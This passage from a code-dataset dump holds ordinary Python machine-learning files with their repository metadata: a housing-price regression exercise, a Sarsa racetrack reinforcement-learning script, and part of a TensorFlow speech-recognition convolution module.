usar sklearn para completar os valores nulos com a mediana\nprint(imputer.statistics_)\n\nX = imputer.transform(housing_num)\nhousing_tr = pd.DataFrame(X, columns=housing_num.columns)\n\nencoder = LabelEncoder() # pŕoblema que os algoritmos de ml acham que categorias mais próximas são similares\nhousing_cat = housing[\"ocean_proximity\"]\nhousing_cat_encoded = encoder.fit_transform(housing_cat)\nprint(housing_cat_encoded)\n\nencoder = OneHotEncoder()\nhousing_cat_1hot = encoder.fit_transform(housing_cat_encoded.reshape(-1, 1))\nprint(housing_cat_1hot)\n\nencoder = LabelBinarizer()\nhousing_cat_1hot = encoder.fit_transform(housing_cat)\nprint(housing_cat_1hot)\n\nattr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)\nhousing_extra_attribs = attr_adder.transform(housing.values)\n\nhousing_extra_attribs = pd.DataFrame(\n housing_extra_attribs,\n columns=list(housing.columns)+[\"rooms_per_household\", \"population_per_household\"])\nprint(housing_extra_attribs.head())\n\nnum_attribs = list(housing_num)\ncat_attribs = [\"ocean_proximity\"]\n\nnum_pipeline = Pipeline([\n # ('selector', DataFrameSelector(num_attribs)),\n ('imputer', Imputer(strategy=\"median\")),\n ('attribs_adder', CombinedAttributesAdder()),\n ('std_scaler', StandardScaler()),\n ])\n\n# cat_pipeline = Pipeline([\n# ('selector', DataFrameSelector(cat_attribs)),\n# ('cat_encoder', OneHotEncoder()),\n# ])\n\nfull_pipeline = ColumnTransformer([\n (\"num\", num_pipeline, num_attribs),\n (\"cat\", OneHotEncoder(), cat_attribs),\n ])\n\nhousing_prepared = full_pipeline.fit_transform(housing)\nprint(housing_prepared)\nprint(housing_prepared.shape)\n\n# Trainando o modelo\nlin_reg = LinearRegression()\nlin_reg.fit(housing_prepared, housing_labels)\n\nsome_data = housing.iloc[:5]\nsome_labels = housing_labels.iloc[:5]\nsome_data_prepared = full_pipeline.transform(some_data)\nprint(\"Predictions:\\t\", lin_reg.predict(some_data_prepared))\nprint(\"Labels:\\t\\t\", list(some_labels))\n\nhousing_predictions = lin_reg.predict(housing_prepared)\nlin_mse = mean_squared_error(housing_labels, housing_predictions)\nlin_rmse = np.sqrt(lin_mse)\nprint(lin_rmse)\n\ntree_reg = DecisionTreeRegressor()\ntree_reg.fit(housing_prepared, housing_labels)\nhousing_predictions = tree_reg.predict(housing_prepared)\ntree_mse = mean_squared_error(housing_labels, housing_predictions)\ntree_rmse = np.sqrt(tree_mse)\nprint(tree_rmse)\n\nscores = cross_val_score(tree_reg, housing_prepared, housing_labels, scoring='neg_mean_squared_error', cv=10)\nrmse_scores = np.sqrt(-scores)\ndisplay_scores(rmse_scores)\n\nforest_reg = RandomForestRegressor()\nforest_reg.fit(housing_prepared, housing_labels)\nhousing_predictions = forest_reg.predict(housing_prepared)\nforest_mse = mean_squared_error(housing_labels, housing_predictions)\nforest_rmse = np.sqrt(forest_mse)\nprint(forest_rmse)\nscores = cross_val_score(forest_reg, housing_prepared, housing_labels, scoring='neg_mean_squared_error', cv=10)\nrmse_scores = np.sqrt(-scores)\ndisplay_scores(rmse_scores)\n\nparam_grid = [\n {'n_estimators': [3, 10, 30, 40, 50], 'max_features': [2, 4, 5, 6, 7, 8]},\n {'bootstrap': [False], 'n_estimators': [3, 10], 'max_features': [2, 3, 4]}\n]\n\nforest_reg = RandomForestRegressor()\n\ngrid_search = GridSearchCV(forest_reg, param_grid, cv=5, scoring='neg_mean_squared_error')\ngrid_search.fit(housing_prepared, housing_labels)\nprint(grid_search.best_params_)\nprint(grid_search.best_estimator_)\ncvres = grid_search.cv_results_\nfor mean_score, params in zip(cvres['mean_test_score'], 
cvres['params']):\n print(np.sqrt(-mean_score), params)\n\nfeature_importances = grid_search.best_estimator_.feature_importances_\nprint(feature_importances)\nextra_attribs = ['rooms_per_hhold', 'pop_per_hhold', 'bedrooms_per_rooms']\ncat_one_hot_attribs = list(encoder.classes_)\nattributes = num_attribs + extra_attribs + cat_one_hot_attribs\nsorted(zip(feature_importances))\n\nfinal_model = grid_search.best_estimator_\n\nX_test = strat_test_set.drop(\"median_house_value\", axis=1)\nY_test = strat_test_set[\"median_house_value\"].copy()\n\nX_test_prepared = full_pipeline.transform(X_test)\n\nfinal_predictions = final_model.predict(X_test_prepared)\nfinal_mse = mean_squared_error(Y_test, final_predictions)\nfinal_rmse = np.sqrt(final_mse)\ndisplay_scores(final_rmse)\n", "repo_name": "higornucci/classificacao-aulas", "sub_path": "handson/housing.py", "file_name": "housing.py", "file_ext": "py", "file_size_in_byte": 11301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 35, "usage_type": "name"}, {"api_name": "sklearn.base.TransformerMixin", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.c_", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.c_", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "six.moves.urllib.request.urlretrieve", "line_number": 85, "usage_type": "call"}, {"api_name": "six.moves.urllib.request", "line_number": 85, "usage_type": "attribute"}, {"api_name": "six.moves.urllib", "line_number": 85, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 86, "usage_type": "call"}, 
{"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedShuffleSplit", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Imputer", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 195, "usage_type": "call"}, {"api_name": "future_encoders.OneHotEncoder", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelBinarizer", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 211, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 219, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.Imputer", "line_number": 221, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 223, "usage_type": "call"}, {"api_name": "future_encoders.ColumnTransformer", "line_number": 231, "usage_type": "call"}, {"api_name": "future_encoders.OneHotEncoder", "line_number": 233, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 241, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 252, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 255, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 259, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 263, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 266, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 270, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 273, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 281, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 289, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 307, "usage_type": "call"}]}
+{"seq_id": "34070809706", "text": "#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# # Sutton and Barto Racetrack: Sarsa\r\n# Exercise 5.8 from *Reinforcement Learning: An Introduction* by Sutton and Barto.\r\n# \r\n# This notebook applies the **Sarsa** algorithm from Chapter 6 to the Racetrack problem from Chapter 5. \r\n# \r\n# Python Notebook by Patrick Coady: [Learning Artificial Intelligence](https://learningai.io/)\r\n\r\n# In[1]:\r\n\r\n\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# In[2]:\r\n\r\n\r\nclass RaceTrack(object):\r\n \"\"\"\r\n RaceTrack object maintains and updates the race track \r\n state. Interaction with the class is through\r\n the take_action() method. The take_action() method returns\r\n a successor state and reward (i.e. s' and r)\r\n\r\n The class constructor is given a race course as a list of \r\n strings. The constructor loads the course and initializes \r\n the environment state.\r\n \"\"\"\r\n\r\n def __init__(self, course):\r\n \"\"\"\r\n Load race course, set any min or max limits in the \r\n environment (e.g. max speed), and set initial state.\r\n Initial state is random position on start line with \r\n velocity = (0, 0).\r\n\r\n Args:\r\n course: List of text strings used to construct\r\n race-track.\r\n '+': start line\r\n '-': finish line\r\n 'o': track\r\n 'X': wall\r\n\r\n Returns:\r\n self\r\n \"\"\"\r\n self.NOISE = 0.0\r\n self.EPS = 0.1 # epsilon-greedy coefficient\r\n self.MAX_VELOCITY = 4\r\n self.start_positions = []\r\n self.course = None\r\n self._load_course(course)\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n\r\n def take_action(self, action):\r\n \"\"\"\r\n Take action, return state' and reward\r\n\r\n Args:\r\n action: 2-tuple of requested change in velocity in x- and\r\n y-direction. valid action is -1, 0, +1 in each axis.\r\n\r\n Returns:\r\n reward: integer\r\n \"\"\"\r\n\r\n self._update_velocity(action)\r\n self._update_position()\r\n if self.is_terminal_state():\r\n return 100.0\r\n\r\n return -1.0\r\n\r\n def get_state(self):\r\n \"\"\"Return 2-tuple: (position, velocity). Each is a 2D numpy array.\"\"\"\r\n return self.position.copy(), self.velocity.copy()\r\n\r\n def _update_velocity(self, action):\r\n \"\"\"\r\n Update x- and y-velocity. Clip at 0 and self.MAX_VELOCITY\r\n\r\n Args:\r\n action: 2-tuple of requested change in velocity in x- and\r\n y-direction. valid action is -1, 0, +1 in each axis. \r\n \"\"\"\r\n if np.random.rand() > self.NOISE:\r\n self.velocity += np.array(action, dtype=np.int16)\r\n self.velocity = np.minimum(self.velocity, self.MAX_VELOCITY)\r\n self.velocity = np.maximum(self.velocity, 0)\r\n\r\n def reset(self):\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n\r\n def _update_position(self):\r\n \"\"\"\r\n Update position based on present velocity. Check at fine time \r\n scale for wall or finish. If wall is hit, set position to random\r\n position at start line. 
If finish is reached, set position to \r\n first crossed point on finish line.\r\n \"\"\"\r\n for tstep in range(0, self.MAX_VELOCITY + 1):\r\n t = tstep / self.MAX_VELOCITY\r\n pos = self.position + np.round(self.velocity * t).astype(np.int16)\r\n if self._is_wall(pos):\r\n self._random_start_position()\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n return\r\n if self._is_finish(pos):\r\n self.position = pos\r\n self.velocity = np.array([0, 0], dtype=np.int16)\r\n return\r\n self.position = pos\r\n\r\n def _random_start_position(self):\r\n \"\"\"Set car to random position on start line\"\"\"\r\n self.position = np.array(random.choice(self.start_positions),\r\n dtype=np.int16)\r\n\r\n def _load_course(self, course):\r\n \"\"\"Load course. Internally represented as numpy array\"\"\"\r\n y_size, x_size = len(course), len(course[0])\r\n self.course = np.zeros((x_size, y_size), dtype=np.int16)\r\n for y in range(y_size):\r\n for x in range(x_size):\r\n point = course[y][x]\r\n if point == 'o':\r\n self.course[x, y] = 1\r\n elif point == '-':\r\n self.course[x, y] = 0\r\n elif point == '+':\r\n self.course[x, y] = 2\r\n elif point == 'W':\r\n self.course[x, y] = -1\r\n # flip left/right so (0,0) is in bottom-left corner\r\n self.course = np.fliplr(self.course)\r\n for y in range(y_size):\r\n for x in range(x_size):\r\n if self.course[x, y] == 0:\r\n self.start_positions.append((x, y))\r\n\r\n def _is_wall(self, pos):\r\n \"\"\"Return True is position is wall\"\"\"\r\n return self.course[pos[0], pos[1]] == -1\r\n\r\n def _is_finish(self, pos):\r\n \"\"\"Return True if position is finish line\"\"\"\r\n return self.course[pos[0], pos[1]] == 2\r\n\r\n def is_terminal_state(self):\r\n \"\"\"Return True at episode terminal state\"\"\"\r\n return (self.course[self.position[0],\r\n self.position[1]] == 2)\r\n\r\n def action_to_tuple(self, a):\r\n \"\"\"Convert integer action to 2-tuple: (ax, ay)\"\"\"\r\n ax = a // 3 - 1\r\n ay = a % 3 - 1\r\n\r\n return ax, ay\r\n\r\n def tuple_to_action(self, a):\r\n \"\"\"Convert 2-tuple to integer action: {0-8}\"\"\"\r\n return int((a[0] + 1) * 3 + a[1] + 1)\r\n\r\n def greedy_eps(self, Q):\r\n \"\"\"Based on state and Q values, return epsilon-greedy action\"\"\"\r\n s = self.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n if np.random.rand() > self.EPS:\r\n print(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n if (np.max(Q[s_x, s_y, s_vx, s_vy, :, :]) ==\r\n np.min(Q[s_x, s_y, s_vx, s_vy, :, :])):\r\n a = (0, 0)\r\n else:\r\n a = np.argmax(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n a = np.unravel_index(a, (3, 3)) - np.array([1, 1])\r\n a = (a[0], a[1])\r\n else:\r\n a = self.action_to_tuple(random.randrange(9))\r\n\r\n return a\r\n\r\n def srts(self,Q):\r\n pass\r\n\r\n\r\n def state_action(self, s, a):\r\n \"\"\"Build state-action tuple for indexing Q NumPy array\"\"\"\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n a_x, a_y = a[0] + 1, a[1] + 1\r\n s_a = (s_x, s_y, s_vx, s_vy, a_x, a_y)\r\n\r\n return s_a\r\n\r\n # In[3]:\r\n\r\n\r\n# Race Track from Sutton and Barto Figure 5.6\r\n\r\nbig_course = ['WWWWWWWWWWWWWWWWWW',\r\n 'WWWWooooooooooooo+',\r\n 'WWWoooooooooooooo+',\r\n 'WWWoooooooooooooo+',\r\n 'WWooooooooooooooo+',\r\n 'Woooooooooooooooo+',\r\n 'Woooooooooooooooo+',\r\n 'WooooooooooWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WoooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 
'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWooooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWoooooooWWWWWWWW',\r\n 'WWWWooooooWWWWWWWW',\r\n 'WWWWooooooWWWWWWWW',\r\n 'WWWW------WWWWWWWW']\r\n\r\n# Tiny course for debug\r\n\r\ntiny_course = ['WWWWWW',\r\n 'Woooo+',\r\n 'Woooo+',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'WooWWW',\r\n 'W--WWW', ]\r\n\r\n# In[4]:\r\n\r\n\r\n# Problem Initialization\r\n\r\ncourse = big_course\r\nx_size, y_size = len(course[0]), len(course)\r\n# Q[x_pos, y_pos, x_velocity, y-velocity, x-acceleration, y-acceleration]\r\nQ = np.zeros((x_size, y_size, 5, 5, 3, 3), dtype=np.float64)\r\nposition_map = np.zeros((x_size, y_size), dtype=np.float64) # track explored positions\r\n\r\nN = 2000 # num episodes\r\ngamma = 1.0\r\nalpha = 0.1\r\ntrack = RaceTrack(course)\r\n\r\n# Sarsa\r\n\r\nepochs = []\r\ncounts = []\r\ncount = 0\r\nfor e in range(N):\r\n if (e + 1) % 200 == 0: print('Episode {}'.format(e + 1))\r\n track.reset()\r\n s = track.get_state()\r\n a = track.greedy_eps(Q)\r\n\r\n while not track.is_terminal_state():\r\n position_map[s[0][0], s[0][1]] += 1\r\n count += 1\r\n r = track.take_action(a)\r\n s_prime = track.get_state()\r\n a_prime = track.greedy_eps(Q)\r\n s_a = track.state_action(s, a)\r\n s_a_prime = track.state_action(s_prime, a_prime)\r\n Q[s_a] = Q[s_a] + alpha * (r + gamma * Q[s_a_prime] - Q[s_a])\r\n s, a = s_prime, a_prime\r\n epochs.append(e)\r\n counts.append(count)\r\n\r\n\r\n\r\n\r\n\r\n# In[5]:\r\n\r\n\r\nplt.plot(epochs, counts)\r\nplt.title('Simulation Steps vs. 
Episodes')\r\nplt.xlabel('Epochs')\r\nplt.ylabel('Total Simulation Steps')\r\nplt.show()\r\n\r\n# In[6]:\r\n\r\n\r\nprint('Heat map of position exploration:')\r\nplt.imshow(np.flipud(position_map.T), cmap='hot', interpolation='nearest')\r\nplt.show()\r\n\r\n# In[7]:\r\n\r\n\r\n# Convert Q (action-values) to pi (policy)\r\npi = np.zeros((x_size, y_size, 5, 5), dtype=np.int16)\r\nfor idx in np.ndindex(x_size, y_size, 5, 5):\r\n a = np.argmax(Q[idx[0], idx[1], idx[2], idx[3], :, :])\r\n a = np.unravel_index(a, (3, 3))\r\n pi[idx] = track.tuple_to_action(a - np.array([1, 1]))\r\n\r\n# In[8]:\r\n\r\n\r\n# Run learned policy on test case\r\n\r\npos_map = np.zeros((x_size, y_size))\r\ntrack.reset()\r\nfor e in range(1000):\r\n s = track.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n pos_map[s_x, s_y] += 1 # exploration map\r\n act = track.action_to_tuple(pi[s_x, s_y, s_vx, s_vy])\r\n track.take_action(act)\r\n if track.is_terminal_state(): break\r\n\r\nprint('Sample trajectory on learned policy:')\r\npos_map = (pos_map > 0).astype(np.float32)\r\npos_map += track.course # overlay track course\r\nplt.imshow(np.flipud(pos_map.T), cmap='hot', interpolation='nearest')\r\nplt.show()\r\n\r\n", "repo_name": "AnikHawk/AI-Lab", "sub_path": "Arc Consistency/SRTS.py", "file_name": "SRTS.py", "file_ext": "py", "file_size_in_byte": 10785, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 93, "usage_type": "attribute"}, {"api_name": "numpy.minimum", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 123, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.fliplr", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 184, "usage_type": "call"}, 
{"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 262, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 263, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "numpy.flipud", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 318, "usage_type": "attribute"}, {"api_name": "numpy.ndindex", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 341, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "numpy.flipud", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}]}
+{"seq_id": "44030322090", "text": "from typing import List\nimport tensorflow as tf\n\nfrom tensorflow_asr.utils import math_util\n\nL2 = tf.keras.regularizers.l2(1e-6)\n\n\ndef get_activation(\n activation: str = \"silu\",\n):\n activation = activation.lower()\n if activation in [\"silu\", \"swish\"]:\n return tf.nn.swish\n elif activation == \"relu\":\n return tf.nn.relu\n elif activation == \"linear\":\n return tf.keras.activations.linear\n else:\n raise ValueError(\"activation must be either 'silu', 'swish', 'relu' or 'linear'\")\n\n\nclass Reshape(tf.keras.layers.Layer):\n def call(self, inputs):\n return math_util.merge_two_last_dims(inputs)\n\n\nclass ConvModule(tf.keras.layers.Layer):\n def __init__(\n self,\n kernel_size: int = 3,\n strides: int = 1,\n filters: int = 256,\n activation: str = \"silu\",\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ConvModule, self).__init__(**kwargs)\n self.strides = strides\n self.conv = tf.keras.layers.SeparableConv1D(\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=\"same\",\n depthwise_regularizer=kernel_regularizer,\n pointwise_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv\",\n )\n self.bn = tf.keras.layers.BatchNormalization(name=f\"{self.name}_bn\")\n self.activation = get_activation(activation)\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n outputs = self.conv(inputs, training=training)\n outputs = self.bn(outputs, training=training)\n outputs = self.activation(outputs)\n return outputs\n\n\nclass SEModule(tf.keras.layers.Layer):\n def __init__(\n self,\n kernel_size: int = 3,\n strides: int = 1,\n filters: int = 256,\n activation: str = \"silu\",\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(SEModule, self).__init__(**kwargs)\n self.conv = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module\",\n )\n self.activation = get_activation(activation)\n self.fc1 = tf.keras.layers.Dense(filters // 8, name=f\"{self.name}_fc1\")\n self.fc2 = tf.keras.layers.Dense(filters, name=f\"{self.name}_fc2\")\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n features, input_length = inputs\n outputs = self.conv(features, training=training)\n\n se = tf.divide(tf.reduce_sum(outputs, axis=1), tf.expand_dims(tf.cast(input_length, dtype=outputs.dtype), axis=1))\n se = self.fc1(se, training=training)\n se = self.activation(se)\n se = self.fc2(se, training=training)\n se = self.activation(se)\n se = tf.nn.sigmoid(se)\n se = tf.expand_dims(se, axis=1)\n\n outputs = tf.multiply(outputs, se)\n return outputs\n\n\nclass ConvBlock(tf.keras.layers.Layer):\n def __init__(\n self,\n nlayers: int = 3,\n kernel_size: int = 3,\n filters: int = 256,\n strides: int = 1,\n residual: bool = True,\n activation: str = \"silu\",\n alpha: float = 1.0,\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ConvBlock, self).__init__(**kwargs)\n\n self.dmodel = filters\n self.time_reduction_factor = strides\n filters = int(filters * alpha)\n\n self.convs = []\n for i in range(nlayers - 1):\n self.convs.append(\n ConvModule(\n kernel_size=kernel_size,\n strides=1,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module_{i}\",\n )\n 
)\n\n self.last_conv = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_conv_module_{nlayers - 1}\",\n )\n\n self.se = SEModule(\n kernel_size=kernel_size,\n strides=1,\n filters=filters,\n activation=activation,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_se\",\n )\n\n self.residual = None\n if residual:\n self.residual = ConvModule(\n kernel_size=kernel_size,\n strides=strides,\n filters=filters,\n activation=\"linear\",\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_residual\",\n )\n\n self.activation = get_activation(activation)\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n features, input_length = inputs\n outputs = features\n for conv in self.convs:\n outputs = conv(outputs, training=training)\n outputs = self.last_conv(outputs, training=training)\n input_length = math_util.get_reduced_length(input_length, self.last_conv.strides)\n outputs = self.se([outputs, input_length], training=training)\n if self.residual is not None:\n res = self.residual(features, training=training)\n outputs = tf.add(outputs, res)\n outputs = self.activation(outputs)\n return outputs, input_length\n\n\nclass 